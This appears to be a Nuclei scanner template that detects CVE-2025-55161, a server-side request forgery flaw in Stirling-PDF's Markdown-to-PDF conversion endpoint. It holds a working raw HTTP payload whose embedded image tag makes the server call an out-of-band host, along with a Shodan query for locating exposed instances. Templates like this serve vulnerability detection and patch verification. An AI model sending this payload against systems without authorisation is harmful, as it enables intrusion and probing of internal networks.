CVE-2025-55161: Stirling-PDF SSRF via Markdown

id: CVE-2025-55161

info:
  name: Stirling-PDF SSRF via Markdown
  author: beginee
  severity: high
  description: |
    Stirling-PDF is a locally hosted web application that performs various operations on PDF files. Prior to version 1.1.0, when using the /api/v1/convert/markdown/pdf endpoint to convert Markdown to PDF, the backend calls a third-party tool to process it and includes a sanitizer for security sanitization which can be bypassed and result in SSRF.
  remediation: This issue has been patched in version 1.1.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55161
    - https://github.com/Stirling-Tools/Stirling-PDF
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2025-55161
    cwe-id: CWE-918
    epss-score: 0.03024
    epss-percentile: 0.86137
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Stirling PDF"
  tags: cve,cve2025,ssrf,stirling-pdf,pdf,markdown,oast,oob

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /api/v1/convert/markdown/pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK

        ------WebKitFormBoundaryvAfAbBmFpYrQfooK
        Content-Disposition: form-data; name="fileInput"; filename="{{filename}}.md"
        Content-Type: application/octet-stream

        <img src='http://{{interactsh-url}}/' />
        ------WebKitFormBoundaryvAfAbBmFpYrQfooK--

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "application/pdf")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100d952265a3083f70f0385940d9390f3e75535f725dc64f3b9b799efc1d0032c00022100b81e1d258a6b26ca213ecc433757f7a7bb38562fb7178406a56b738cb4f354ae:922c64590222798bb761d5b6d8e72950